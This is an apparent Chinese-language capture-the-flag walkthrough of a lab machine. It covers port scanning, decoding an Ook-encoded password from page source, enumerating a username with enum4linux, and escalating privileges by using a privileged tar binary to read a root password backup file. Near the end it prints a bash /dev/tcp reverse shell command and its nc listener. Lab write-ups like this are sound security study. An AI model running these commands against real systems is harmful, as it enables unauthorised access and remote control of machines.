1.首先经典两件套
nmap -A 扫描
发现开放很多端口(80,10000,20000为重点关注)
问题不大,先dirsearch扫一下目录再说
结果能看的manual里啥也没有,之后再查看80端口界面源代码
发现有一串字符
但是问了ai也没解出来,最后才知道是ook的解密方式,得到.2uqPEfj3D<P'a-3
下面是ook解码官网:Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]https://www.splitbrain.org/services/ookhttps://www.splitbrain.org/services/ookhttps://www.splitbrain.org/services/ook
2.有了不知道是什么的一串字符,再接着查看10000和20000端口
猜测之前的字符串是其中的密码:)
但!还是没想法知道用户名,随后想着bp字典爆破,但是并没有爆破出来
后面使用kali自带的enum4linux 进行信息收集
获得一个cyber用户名,跟之前的密码匹配登录成功!
3.紧接着找到一个shell命令行
找到第一个flag
而这个tar放在这边猜测一定有用,随后想着提权。
4.利用tar命令提权
而运行tar,发现此tar可执行!
随后再/var/backups下找到.old_pass.bak文件,但是无法查看
而想到tar可以执行,紧接着将此文件打包到tar所在目录,再接着使用tar进行解压
./tar -cvf pass.tar /var/backups/.old_pass.bak
tar -xvf pass.tar
注意:此处tar必须使用./tar才能执行。
查看pass.tar
出现root密码Ts&4&YurgtRX(=~h
但是奇怪的是sudo是没有,但su也用不了。
之后决定反弹shell试试
靶机:bash -i >& /dev/tcp/192.168.192.128/4444 0>&1
主机:nc -lvvp 4444
连上后再试一下,成功提权!
最终/root下找到最后一个flag,完成靶场!